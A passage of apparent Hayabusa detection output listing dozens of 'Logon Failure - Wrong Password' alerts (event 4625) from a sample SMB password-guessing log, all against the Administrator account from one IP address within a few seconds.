+2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wu4djhEVSMYBOmjF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e0NOdXhEkW6MskA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nqxLHaOtkHHNAa1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCrCf73NtEpk5DUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YVFm1epksVGO1nFY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YmVehuMHvh5kVqRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sERZrNUHsKVEShCb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eaSNgw2hvkxLnQF8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FSYOWptgxHYTDv1x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Van1qwuRoWYPWrIY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyLCa9OHocazZKQ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxrR5iUsTI9LVnLL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TxMREacN0QfvL51B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fbzSHaZBDH4zFZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NgIei0bMIcslJCVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JPoKjwanczELBC5A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOYMVAnCWB2RFYAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1S45GBtQ8Uoyilw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 60oeDAnU41sz1wYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enjlrrdf6lrm7Bao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58WzO6wxh7QshZgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eZKzHgu5ADLYsWU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uOSK3xC1E5PpBVNM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vFXasYWGCHbQOWWI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XlYJ3oHYKYhg0KC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LxOKwi8Q4y2mHBDu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwFKFySH4w2yWtPX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlwGTGadOEMfUFiM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hZ9WuMoOtxGdwOQn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cCLK0gWvRoz0Ceao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZDrcOxtm2fHXK5pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pm2tPGetcAJkSuvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FBskiUSfF2ghuDcF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZJal2nq3JAk6I2S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9ek0Sl1ikhIfIb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eHrn5Tp9JtnAgCbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7tR8gp2piqqixqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SqSBRMoiFeWe4FAt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nu4m1xKDU0OUkoR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gui98cdQHPgyNOZI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bm4U7TAfsPTEiygC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fDOoaVWVFAMLiA71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qiJeLgInEkHffefo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWyguWQP2iYUArhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vDa3GqsTMMXguFhi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lr0lkAcdnji1zjW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4WfNFd5MkQxaxHGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8hdPhtxP4Ds65yV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y2BBoWoXWXuRysTx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6GEhZ2BduHwjJj9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GbwEHQCAUJd64LlA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wGfoObbN8ioefyce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iLHhCgHvmOzoLLqG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9KL69y47DMyFOWT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ECuVYiqdMw2dMjT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YJCYumRekD7AREYQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0H4OxKzoemZrsosT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSHnvxa0khWdWBVx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bJkPp0bghDCPYz52 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SfHRWGXjCej9HSPb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X42H7EvrvzsRqXWO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: moo42NdOq30Gnz3T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A4NHVYxxDkCOsQw8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iPUiW0vFQB405kwS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OtcZ4ymkeLHeU7YJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZxZCDKWtqkGJ0dnw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f4GGnhttZgmRPRJo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gI0j9w45eXEFeex3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BVZ2YRDUAOsNgKxo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJfIpxlcwVf7pWga | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Oerixd9ODF6fslsC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbJC5yvrIymYgaHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4schZcUP8Im8Ee1e | IP Addr: 192.168.198.149 | AuthPackage: 
